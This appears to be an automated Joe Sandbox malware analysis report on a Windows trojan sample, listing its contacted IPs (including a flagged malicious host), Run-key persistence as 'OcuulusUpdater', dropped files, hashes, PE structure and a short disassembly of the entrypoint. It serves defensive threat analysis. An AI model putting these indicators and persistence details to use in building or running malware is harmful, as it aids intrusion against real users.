                      http://ipinfo.iocvtres.exe, 0000000C.00000002.2507488327.00000000030DF000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003103000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003004000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000304C000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000307E000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030D3000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003152000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003072000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003090000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003010000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030AF000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000314A000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030CD000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030EA000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003040000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003143000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000309C000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030BB000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030D9000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                      https://i.ibb.co/RvwvG2z/icaruwsdr-athens.pngcvtres.exe, 0000000C.00000002.2503619664.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalseunknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      193.142.146.64
                      		unknownNetherlands
                      		208046HOSTSLICK-GERMANYNLtrue
                      34.117.59.81
                      		ipinfo.ioUnited States
                      		139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse

                      General Information

                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1526431
                      Start date and time:2024-10-05 16:45:18 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 8m 8s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:28
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:licarisan_api.exe
                      Detection:MAL
                      Classification:mal100.troj.evad.winEXE@21/12@5/2
                      EGA Information:
                      • Successful, ratio: 66.7%
                      HCA Information:
                      • Successful, ratio: 85%
                      • Number of executed functions: 197
                      • Number of non-executed functions: 37
                      Cookbook Comments:
                      • Found application associated with file extension: .exe

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                      • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                      • Execution Graph export aborted for target cvtres.exe, PID 7640 because it is empty
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtCreateKey calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      11:47:29API Interceptor41x Sleep call for process: powershell.exe modified
                      11:47:31API Interceptor476581x Sleep call for process: cvtres.exe modified
                      16:46:34Task SchedulerRun new task: CreateExplorerShellUnelevatedTask path: C:\Windows\explorer.exe s>/NoUACCheck
                      17:47:36AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OcuulusUpdater C:\Users\user\Music\OcoulsUpdater\EyesUpdater.exe
                      17:47:45AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OcuulusUpdater C:\Users\user\Music\OcoulsUpdater\EyesUpdater.exe

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      193.142.146.64an_api.exeGet hashmaliciousUnknownBrowse
                        build.exeGet hashmaliciousUnknownBrowse
                          Form-8879_PDF.jarGet hashmaliciousUnknownBrowse
                            Form-8879_PDF.jarGet hashmaliciousUnknownBrowse
                              34.117.59.81build.exeGet hashmaliciousUnknownBrowse
                              • ipinfo.io/ip
                              YjcgpfVBcm.batGet hashmaliciousUnknownBrowse
                              • ipinfo.io/json
                              lePDF.cmdGet hashmaliciousUnknownBrowse
                              • ipinfo.io/json
                              6Mpsoq1.php.ps1Get hashmaliciousUnknownBrowse
                              • ipinfo.io/json
                              mjOiDa1hrN.batGet hashmaliciousUnknownBrowse
                              • ipinfo.io/json
                              8ym4cxJPyl.ps1Get hashmaliciousUnknownBrowse
                              • ipinfo.io/json
                              GKrKPXOkdF.zsb.dllGet hashmaliciousUnknownBrowse
                              • ipinfo.io/json
                              JuhnladbIs.qao.dllGet hashmaliciousUnknownBrowse
                              • ipinfo.io/json
                              bdsBbxwPyV.ena.dllGet hashmaliciousUnknownBrowse
                              • ipinfo.io/json
                              fblXRRCHON.pos.dllGet hashmaliciousUnknownBrowse
                              • ipinfo.io/json

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              ipinfo.iobuild.exeGet hashmaliciousUnknownBrowse
                              • 34.117.59.81
                              d1bc91bd44a0.exeGet hashmaliciousPrivateLoader, Stealc, VidarBrowse
                              • 34.117.59.81
                              setup.exeGet hashmaliciousUnknownBrowse
                              • 34.117.59.81
                              file.exeGet hashmaliciousRDPWrap Tool, Amadey, Socks5Systemz, Stealc, Vidar, XmrigBrowse
                              • 34.117.59.81
                              sqlite.dllGet hashmaliciousUnknownBrowse
                              • 34.117.59.81
                              T3xpD9ZaYu.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • 34.117.59.81
                              66fb252fe232b_Patksl.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                              • 34.117.59.81
                              file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                              • 34.117.59.81
                              file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                              • 34.117.59.81
                              OXrZ6fj4Hq.exeGet hashmaliciousNeshta, Oski Stealer, StormKitty, SugarDump, Vidar, XWormBrowse
                              • 34.117.59.81

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              HOSTSLICK-GERMANYNLan_api.exeGet hashmaliciousUnknownBrowse
                              • 193.142.146.64
                              build.exeGet hashmaliciousUnknownBrowse
                              • 193.142.146.64
                              ub16vsLP6y.zipGet hashmaliciousRemcosBrowse
                              • 193.142.146.203
                              ISehgzqm2V.zipGet hashmaliciousRemcosBrowse
                              • 193.142.146.203
                              Form-8879_PDF.jarGet hashmaliciousUnknownBrowse
                              • 193.142.146.64
                              Form-8879_PDF.jarGet hashmaliciousUnknownBrowse
                              • 193.142.146.64
                              bot_library.exeGet hashmaliciousUnknownBrowse
                              • 193.142.146.43
                              SecuriteInfo.com.ELF.Mirai-CQT.17542.12898.elfGet hashmaliciousMiraiBrowse
                              • 193.142.146.10
                              arm7.elfGet hashmaliciousUnknownBrowse
                              • 193.142.146.10
                              SecuriteInfo.com.ELF.Mirai-CQU.1502.23988.elfGet hashmaliciousUnknownBrowse
                              • 193.142.146.10
                              GOOGLE-AS-APGoogleAsiaPacificPteLtdSGbuild.exeGet hashmaliciousUnknownBrowse
                              • 34.117.59.81
                              https://s3.amazonaws.com/r3e1272/Rco.html#4eyOul3510eTKK19nejdimaazo189TBUDIERNFIMTFBQ264510CRSG907S11Get hashmaliciousPhisherBrowse
                              • 34.117.39.58
                              http://nirothniroth.site/?p=22&fbclid=IwY2xjawFs_DdleHRuA2FlbQIxMQABHTdgZU6ok722L5RxKPR-zh7Gkm6BqZ8BcT950y1bxf6l0LKz0zslg7KJHw_aem__ldVm1UUndXAkwYRakjBzgGet hashmaliciousUnknownBrowse
                              • 34.117.77.79
                              https://lil-loveeeees.blogspot.com/Get hashmaliciousUnknownBrowse
                              • 34.117.77.79
                              ethaertharety.ps1Get hashmaliciousUnknownBrowse
                              • 34.117.77.79
                              d1bc91bd44a0.exeGet hashmaliciousPrivateLoader, Stealc, VidarBrowse
                              • 34.117.59.81
                              TsxJNxhxMJfQTd.ps1Get hashmaliciousUnknownBrowse
                              • 34.117.77.79
                              setup.exeGet hashmaliciousUnknownBrowse
                              • 34.117.59.81
                              hJABTqngKoJnTgLh.ps1Get hashmaliciousUnknownBrowse
                              • 34.117.77.79
                              https://go.hginsights.com/rs/214-HYO-692/images/HGGet hashmaliciousUnknownBrowse
                              • 34.117.177.207

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\csc.exe.log

                              Download File
                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):412
                              Entropy (8bit):5.350425818619351
                              Encrypted:false
                              SSDEEP:12:Q3La/hz92n4M9tDLI4MWuPTAq1KDLI4M6:MLU84qpE4KH1qE4j
                              MD5:EF40B085EA3A6C996900E051DFB237A7
                              SHA1:6DE3D5DD935D5A378422F8BD4F851D9C77C9554C
                              SHA-256:925F2B4F3FBD2DDDC90835ACDA44378C8451D44C07AC21C367F312F94733ED62
                              SHA-512:A9E2D3E43ECB82FADC0E3EA1003EB7CD2CC3A790347D35CB4CBEB81F08BFF82D4868426439C87D2EC746B8E2CF0904EAFA25FCBC91BA26D82659E36C28F91843
                              Malicious:false
                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):2232
                              Entropy (8bit):5.380805901110357
                              Encrypted:false
                              SSDEEP:48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyug:lGLHyIFKL3IZ2KRH9Oug8g
                              MD5:B960EDFE22DD231143EAD8522EEE36C0
                              SHA1:AF669E2D6B3CA5F3FA976F77CE4BEB475943A3A9
                              SHA-256:030069D45E5C4F5A19B2B2A687F1D1FD676B9049D956B26C5A04B7175A1A378F
                              SHA-512:EE8B762F6A642A4964553D30E7D2A44169D0F27DCCB807C5950403EF321E4C8DBE48CA67D66CCDD9688E10D1E459A0D368DF27AE35BDF60E2795B3F78711083C
                              Malicious:false
                              Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ceqaybs.45w.ps1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bqkrcmaq.cgt.ps1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j2104e5b.dcw.ps1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jrhjmc3t.wyx.ps1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mm0x4urf.cpv.psm1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oxopufqs.t4g.psm1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pc4uiqqm.0fh.psm1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r4fokjcz.xcs.psm1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Roaming\temp0923

                              Download File
                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):10
                              Entropy (8bit):2.446439344671015
                              Encrypted:false
                              SSDEEP:3:MKV/z:MKBz
                              MD5:E27D47991851642F9EDCBA5827441DD5
                              SHA1:D2D3C1B59CDE8CA587E7AF6AA565D0B3A6AD69AB
                              SHA-256:0736DC7C3FEFD085EC17D24EF7BE290E4447B87A1196397DD3203D7C19EEACED
                              SHA-512:BEA4525CFC84C6C666628810723D2A28A2184AEC4F16F8F189425A2D669F62B5F89B00B5035D3B38A94629CF5B0EA5F3A4FD2B224A69C19B4450636AE9989205
                              Malicious:false
                              Preview:10/05/2024

                              C:\Users\user\Music\OcoulsUpdater\EyesUpdater.exe

                              Download File
                              Process:C:\Users\user\Desktop\licarisan_api.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):976635604
                              Entropy (8bit):0.05947786259074472
                              Encrypted:false
                              SSDEEP:
                              MD5:20029C77255611C8B6F9E80F4A81EB62
                              SHA1:F2741B8FC4CB365065A63AD5085C561F0FA5C017
                              SHA-256:B4BD94232408814D1FE009CBB777F0297FF15679656E15B0962AFF5A9184D8BD
                              SHA-512:9E3CF62F73B586FD57192CBE603B26BD77D50AED176C17BBA9DA6072C77539FBEC5D1F0D32933F745BE75E64B7C4DA1E079C193232341CD87325370AB1C35847
                              Malicious:false
                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...m.$a......................2...................@..........................0B......i>..........@...............................=.......-1..........D=.xO...`...............................P......................d................................text............................... ..`.itext.............................. ..`.data....@.......@..................@....bss.....................................idata...@.......>..................@....tls.........@...........................rdata.......P......................@..@.rsrc....-1.......1.. ..............@..@.....................................................@......................@..@................................................................................................

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):6.867727256485267
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.94%
                              • Win16/32 Executable Delphi generic (2074/23) 0.02%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:licarisan_api.exe
                              File size:4'038'008 bytes
                              MD5:65a683124fc4ca1839e95322370e2b0d
                              SHA1:7a7eafcfa4349e40cb15ab30b5c64d3415e60b96
                              SHA256:3ff0d50557b5ba7eb306048c0e20dd4304a75aeab0470fe213c5089a031a396f
                              SHA512:14b6d7d06f1bd02fffa5f0a4aecb8bbb7b1441597d9ac27a888f5ff441fce785809bd675c7ef7b1da7f99a8d61100e030b6c8b7b128515e8d713d4ffec54123f
                              SSDEEP:49152:bP70hwGvLJT/a9yLe7lAsYaxBjbdOGMneGzxgUgoJUcaqCDx6ITcP2MNoSPhaC+O:nUgoJUBZJoP2MNBajvXOSq
                              TLSH:28166B21F217E44BD5692579D473D5F26262ADF8E0218603BEBE3C373B70EA0590CAD9
                              File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                              File Icon

                              Icon Hash:3b71d48cc8c86907

                              Static PE Info

                              General

                              Entrypoint:0x4aac88
                              Entrypoint Section:.itext
                              Digitally signed:true
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                              DLL Characteristics:
                              Time Stamp:0x6124A66D [Tue Aug 24 07:57:33 2021 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:0
                              File Version Major:5
                              File Version Minor:0
                              Subsystem Version Major:5
                              Subsystem Version Minor:0
                              Import Hash:33e003ddaff3bc71480e8cb946f52917

                              Authenticode Signature

                              Signature Valid:
                              Signature Issuer:
                              Signature Validation Error:
                              Error Number:
                              Not Before, Not After
                                Subject Chain
                                  Version:
                                  Thumbprint MD5:
                                  Thumbprint SHA-1:
                                  Thumbprint SHA-256:
                                  Serial:

                                  Entrypoint Preview

                                  Instruction
                                  push ebp
                                  mov ebp, esp
                                  add esp, FFFFFFF0h
                                  mov eax, 004A98E4h
                                  call 00007F965CC9A489h
                                  call 00007F965CD426ACh
                                  mov eax, dword ptr [004F2830h]
                                  mov eax, dword ptr [eax]
                                  call 00007F965CC9F6BCh
                                  mov eax, dword ptr [004F2830h]
                                  mov eax, dword ptr [eax]
                                  mov dl, 01h
                                  call 00007F965CC9F6FEh
                                  mov ecx, dword ptr [004AED4Ch]
                                  mov eax, dword ptr [004F2830h]
                                  mov eax, dword ptr [eax]
                                  mov edx, dword ptr [004A9528h]
                                  call 00007F965CC9F69Eh
                                  mov eax, dword ptr [004F2830h]
                                  mov eax, dword ptr [eax]
                                  call 00007F965CC9F69Ah
                                  call 00007F965CC9A0EDh
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al

                                  Data Directories

                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xf00000x13dee.idata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x1100000x312d9e.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x3d44000x4f78.rsrc
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1060000x95f8.rdata
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x1050000x18.rdata
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0xf1f640x1a00.idata
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                  Sections

                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  .text0x10000xa90000xa8e004dcedc69be1aede81644ce6a3e6887bdFalse0.46360045799407845data6.68785487611313IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  .itext0xaa0000x10000xe0047f13ebf2c1d7f5f845d183af3921c70False0.533203125data5.726454537490657IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  .data0xab0000x40000x400050b772b21b84466c3b21a7e6d5fd0748False0.48486328125DOS executable (block device driver)5.33588059365472IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .bss0xaf0000x410000x410005bff631ec26d3f55787437155f977ca0False0.6882549579326923data7.410450162378423IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
